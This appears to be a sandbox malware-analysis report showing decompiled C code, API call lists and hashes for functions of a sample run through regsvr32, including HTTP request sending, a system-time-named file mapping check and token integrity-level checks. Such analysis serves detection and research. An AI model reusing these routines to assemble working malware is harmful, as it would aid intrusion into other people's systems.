Function 02AF60A1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E02AF60A1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02AF82A4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2afa348; // 0x248d5a8
				_t5 = _t13 + 0x2afb87a; // 0x4f88e22
				_t6 = _t13 + 0x2afb594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02AF7F0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2afa34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02af60a1
0x02af60a9
0x02af60ad
0x02af60b3
0x02af60b8
0x02af60bd
0x02af60c0
0x02af60c3
0x02af60c8
0x02af60c9
0x02af60cc
0x02af60d1
0x02af60d8
0x02af60e2
0x02af60e4
0x02af60e5
0x02af60e8
0x02af6104
0x02af610a
0x02af610e
0x02af615c
0x02af6110
0x02af611d
0x02af612d
0x02af6135
0x02af6147
0x02af614b
0x00000000
0x00000000
0x02af6137
0x02af613a
0x02af613f
0x02af6141
0x02af6141
0x02af611f
0x02af6121
0x02af614d
0x02af614e
0x02af614e
0x02af611d
0x02af6163

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02AF113B,?,?,4D283A53,?,?), ref: 02AF60AD
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02AF60C3
_snwprintf.NTDLL ref: 02AF60E8
CreateFileMappingW.KERNELBASE(000000FF,02AFA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02AF6104
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02AF113B,?,?,4D283A53,?), ref: 02AF6116
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02AF612D
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02AF113B,?,?,4D283A53), ref: 02AF614E
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02AF113B,?,?,4D283A53,?), ref: 02AF6156

Strings

@MqtNqt, xrefs: 02AF6156

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MqtNqt
API String ID: 1814172918-2883916605
Opcode ID: 0eefd6ba85baf605ed43bc1802095d1dfebc7953c1fb132f5be761762a0dd337
Instruction ID: d153a35270909e25b4123042099d02a011205b4c747a5bfca50550f78a172ded
Opcode Fuzzy Hash: 0eefd6ba85baf605ed43bc1802095d1dfebc7953c1fb132f5be761762a0dd337
Instruction Fuzzy Hash: 1E21C072E40204BBD7A1ABE4CC05F9E77B9AB48B54F210121FB19E7281DF78D919CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2C73 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02AF2C73(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02AF452E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02AF7B59(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02af2c73
0x02af2c80
0x02af2c82
0x02af2ce5
0x00000000
0x02af2ce5
0x02af2c9a
0x02af2ca1
0x02af2cad
0x02af2cb2
0x02af2cc8
0x02af2cd8
0x00000000
0x02af2cca
0x02af2cca
0x02af2cd1
0x02af2cde
0x02af2cde
0x02af2cde
0x02af2cd1
0x02af2cc8
0x02af2ce3
0x00000000
0x00000000
0x02af2ce9

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02AF5D46,?,?,747581D0,00000000), ref: 02AF2CAD
ResetEvent.KERNEL32(?), ref: 02AF2CB2
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02AF2CBF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?,?), ref: 02AF2CCA
GetLastError.KERNEL32(?,?,00000102,02AF5D46,?,?,747581D0,00000000), ref: 02AF2CE5

Part of subcall function 02AF452E: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02AF2C92,?,?,?,?,00000102,02AF5D46,?,?,747581D0), ref: 02AF453A
Part of subcall function 02AF452E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02AF2C92,?,?,?,?,00000102,02AF5D46,?), ref: 02AF4598
Part of subcall function 02AF452E: lstrcpy.KERNEL32(00000000,00000000), ref: 02AF45A8

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?), ref: 02AF2CD8

Strings

@MqtNqt, xrefs: 02AF2C79

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID: @MqtNqt
API String ID: 3739416942-2883916605
Opcode ID: 1e9fa81343823abd757b419eec5a82c0694367b591169c55b25a2023c73d0264
Instruction ID: a91c6922679e2f848dad72cf8e7bd4e1a363e1ff573ac7a291195ed0854cfb6c
Opcode Fuzzy Hash: 1e9fa81343823abd757b419eec5a82c0694367b591169c55b25a2023c73d0264
Instruction Fuzzy Hash: CD01D631140602AFE7706BF1DD84F1BB6A9FF44364F110B25FB51A10E0DF28E816DA55

Uniqueness

Uniqueness Score: -1.00%

Function 02AF70E7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E02AF70E7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E02AF2129(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E02AF789E(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E02AF789E(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E02AF789E(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E02AF789E(_t46);
				}
				return _t24;
			}

0x02af70e7
0x02af70e7
0x02af70e9
0x02af70eb
0x02af70f2
0x02af70f9
0x02af70f9
0x02af70fe
0x02af7101
0x02af7108
0x02af7111
0x02af7115
0x02af711a
0x02af711a
0x02af711c
0x02af7121
0x02af7125
0x02af712a
0x02af712a
0x02af712c
0x02af7131
0x02af7135
0x02af713a
0x02af713a
0x02af713c
0x02af7147
0x02af714a
0x02af714a
0x02af714c
0x02af7151
0x02af7154
0x02af7154
0x02af7156
0x02af715d
0x02af7160
0x02af7165
0x02af7168
0x02af7168
0x02af716b
0x02af7170
0x02af7173
0x02af7173
0x02af7178
0x02af717c
0x02af717f
0x02af717f
0x02af7184
0x02af7189
0x00000000
0x02af718c
0x02af7193

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 02AF7115
InternetCloseHandle.WININET(?), ref: 02AF711A
InternetSetStatusCallback.WININET(?,00000000), ref: 02AF7125
InternetCloseHandle.WININET(?), ref: 02AF712A
InternetSetStatusCallback.WININET(?,00000000), ref: 02AF7135
InternetCloseHandle.WININET(?), ref: 02AF713A
FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,02AF5DA7,?,?,747581D0,00000000,00000000), ref: 02AF714A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02AF5DA7,?,?,747581D0,00000000,00000000), ref: 02AF7154

Part of subcall function 02AF2129: WaitForMultipleObjects.KERNEL32(00000002,02AF7C1D,00000000,02AF7C1D,?,?,?,02AF7C1D,0000EA60), ref: 02AF2144

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
String ID:
API String ID: 2172891992-0
Opcode ID: 7c34bec2bb245a7a7aaeab58fe7e6479cce91e7ca49ed85e4d198acbd0a1017a
Instruction ID: 37c497be264cab51797f0fc637054f91307c1add2bf1202878265abd2adc9852
Opcode Fuzzy Hash: 7c34bec2bb245a7a7aaeab58fe7e6479cce91e7ca49ed85e4d198acbd0a1017a
Instruction Fuzzy Hash: 4F117F366006485BC670AFEAECC4C1BF7EEAF452047650D18F245D3520CF38F88C8A68

Uniqueness

Uniqueness Score: -1.00%

Function 02AF578B Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02AF578B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2afa2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02AF7A71(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02AF789E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02af5798
0x02af579f
0x02af57a6
0x02af57ba
0x02af57c5
0x02af57dd
0x02af57ea
0x02af57ed
0x02af57f2
0x02af57fd
0x02af5801
0x02af5810
0x02af5814
0x02af5830
0x02af5830
0x02af5834
0x02af5834
0x02af5839
0x02af583d
0x02af5843
0x02af5844
0x02af584b
0x02af5851

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02AF57BD
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02AF57DD
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02AF57ED
CloseHandle.KERNEL32(00000000), ref: 02AF583D

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02AF5810
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02AF5818
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02AF5828

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 85bcfe78f647995a32a4af2cd91f3d279f967f2fbdde2a5560e853c86fd4af49
Instruction ID: 1917b6b843cf4481de31c2f0b80cea3417e217c06635fe00d4472d8aaa2f4095
Opcode Fuzzy Hash: 85bcfe78f647995a32a4af2cd91f3d279f967f2fbdde2a5560e853c86fd4af49
Instruction Fuzzy Hash: A3216A75D00209FFEB509FE4DD84EEEBBB9EB08304F1000A5FA10A6161DB798A55EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2281 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E02AF2281(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2afa348; // 0x248d5a8
				_t1 = _t9 + 0x2afb624; // 0x253d7325
				_t36 = 0;
				_t28 = E02AF6779(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x4f89601
					_t40 = E02AF7A71(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E02AF44D8(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E02AF789E(_t40);
						_t42 = E02AF17F0(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02AF789E(_t36);
							_t36 = _t42;
						}
						_t43 = E02AF5454(_t36, _t33);
						if(_t43 != 0) {
							E02AF789E(_t36);
							_t36 = _t43;
						}
					}
					E02AF789E(_t28);
				}
				return _t36;
			}

0x02af2281
0x02af2284
0x02af2285
0x02af228c
0x02af2293
0x02af229a
0x02af229e
0x02af22a5
0x02af22ac
0x02af22b1
0x02af22b9
0x02af22c3
0x02af22c7
0x02af22cb
0x02af22d1
0x02af22d6
0x02af22e0
0x02af22e6
0x02af22e8
0x02af22ff
0x02af2303
0x02af2306
0x02af230b
0x02af230b
0x02af2314
0x02af2318
0x02af231b
0x02af2320
0x02af2320
0x02af2318
0x02af2323
0x02af2328
0x02af232e

APIs

Part of subcall function 02AF6779: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02AF229A,253D7325,00000000,00000000,?,775EC740,02AF3831), ref: 02AF67E0
Part of subcall function 02AF6779: sprintf.NTDLL ref: 02AF6801

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22AC
lstrlen.KERNEL32(00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22B4

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

strcpy.NTDLL ref: 02AF22CB
lstrcat.KERNEL32(00000000,00000000), ref: 02AF22D6

Part of subcall function 02AF44D8: lstrlen.KERNEL32(00000000,00000000,02AF3831,00000000,?,02AF22E5,00000000,02AF3831,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF44E9

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02AF3831,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF22F3

Part of subcall function 02AF17F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02AF22FF,00000000,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF17FA
Part of subcall function 02AF17F0: _snprintf.NTDLL ref: 02AF1858

Strings

=, xrefs: 02AF22ED

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 5d7b0b99a230c44cf368a5bcaf73be2dd49f4fb2f26089a219dc5f374b88a807
Instruction ID: 73938c24fda9141f66b275b152027a0f468c5c2d2eef043bbffc1e74c9928ab9
Opcode Fuzzy Hash: 5d7b0b99a230c44cf368a5bcaf73be2dd49f4fb2f26089a219dc5f374b88a807
Instruction Fuzzy Hash: FE11E3739412257787927BF89D84CBF7AAE8E89B947150155FB04A7201CF3CDD028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3D80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E02AF3D80(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2afa3cc; // 0x4f89600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2afa3cc; // 0x4f89600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2afa030) {
					HeapFree( *0x2afa2d8, 0, _t8);
				}
				_t9 = E02AF4076(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2afa3cc; // 0x4f89600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x02af3d80
0x02af3d80
0x02af3d89
0x02af3d99
0x02af3d99
0x02af3d9e
0x02af3da3
0x00000000
0x00000000
0x02af3d93
0x02af3d93
0x02af3da5
0x02af3da9
0x02af3dbb
0x02af3dbb
0x02af3dc6
0x02af3dcb
0x02af3dce
0x02af3dd3
0x02af3dd7
0x02af3ddd

APIs

RtlEnterCriticalSection.NTDLL(04F895C0), ref: 02AF3D89
Sleep.KERNEL32(0000000A), ref: 02AF3D93
HeapFree.KERNEL32(00000000,00000000), ref: 02AF3DBB
RtlLeaveCriticalSection.NTDLL(04F895C0), ref: 02AF3DD7

Strings

Uqt, xrefs: 02AF3DBB

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: fab393172991eb06ba94bd1a665cc51f13724755e4530cf2e887f7176d5aa82c
Instruction ID: 4631c3948b24dcb2afa48fdec0e1ec62fd23c30bd4c87f0f7c777aba5f5348ef
Opcode Fuzzy Hash: fab393172991eb06ba94bd1a665cc51f13724755e4530cf2e887f7176d5aa82c
Instruction Fuzzy Hash: D2F05475A403429BDB909FD4DC48F4737E89B00340B004C40F746C6661CF3CD861DB15

Uniqueness

Uniqueness Score: -1.00%

Function 02AF10AD Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E02AF10AD(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02AF39E3();
				if(_t21 != 0) {
					_t60 =  *0x2afa2fc; // 0x4000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x2afa2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2afa178(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02AF40F0( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x2afa348; // 0x248d5a8
					if( *0x2afa2fc > 5) {
						_t8 = _t26 + 0x2afb5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2afb9ef; // 0x44283a44
						_t27 = _t7;
					}
					E02AF65DB(_t27, _t27);
					_t31 = E02AF60A1(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E02AF1F1D();
						 *0x2afa310 =  *0x2afa310 ^ 0x81bbe65d;
						 *0x2afa36c = _t32;
						_t33 = E02AF7A71(0x60);
						 *0x2afa3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x2afa3cc; // 0x4f89600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x2afa3cc; // 0x4f89600
							 *_t52 = 0x2afb827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x2afa2d8, 0, 0x43);
							 *0x2afa368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x2afa2fc; // 0x4000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x2afa348; // 0x248d5a8
								_t13 = _t59 + 0x2afb552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x2af927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02AF54EC( ~_v8 &  *0x2afa310,  &E02AFA00C); // executed
								_t43 = E02AF2792(0, _t56, _t64,  &E02AFA00C); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E02AF68F8(); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E02AF517A(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E02AF4F6E(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2afa17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E02AF5854(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x02af10ad
0x02af10b7
0x02af10ba
0x02af10bd
0x02af10c0
0x02af10c7
0x02af10c9
0x02af10d5
0x02af10d7
0x02af10d7
0x02af10e0
0x02af10e6
0x02af10eb
0x02af1105
0x02af1111
0x02af1113
0x02af1118
0x02af1122
0x02af1122
0x02af111a
0x02af111a
0x02af111a
0x02af111a
0x02af1129
0x02af1136
0x02af113d
0x02af1142
0x02af1142
0x02af114b
0x02af114e
0x02af1174
0x02af1179
0x02af1185
0x02af118a
0x02af118f
0x02af1194
0x02af1196
0x02af11c2
0x02af11c4
0x02af1198
0x02af119c
0x02af11a1
0x02af11a6
0x02af11ad
0x02af11b3
0x02af11b8
0x02af11be
0x02af11c5
0x02af11c7
0x02af11c9
0x02af11d8
0x02af11de
0x02af11e3
0x02af11e5
0x02af1215
0x02af1217
0x02af11e7
0x02af11e7
0x02af11ed
0x02af11fa
0x02af1200
0x02af1200
0x02af1208
0x02af1211
0x02af1218
0x02af121a
0x02af121c
0x02af1223
0x02af1230
0x02af1235
0x02af123a
0x02af123c
0x02af123e
0x00000000
0x00000000
0x02af1240
0x02af1245
0x02af1247
0x02af124e
0x02af1252
0x02af1255
0x02af126a
0x02af126e
0x02af1273
0x00000000
0x02af1273
0x02af1257
0x02af1259
0x00000000
0x00000000
0x02af1264
0x02af1266
0x02af1268
0x00000000
0x00000000
0x00000000
0x02af1268
0x02af124b
0x02af124b
0x02af121c
0x02af1150
0x02af1150
0x02af1155
0x02af1275
0x02af127a
0x02af1282
0x02af1282
0x00000000
0x02af127a
0x02af115b
0x02af115e
0x02af1168
0x02af116f
0x00000000
0x02af128a
0x02af128a
0x02af128d
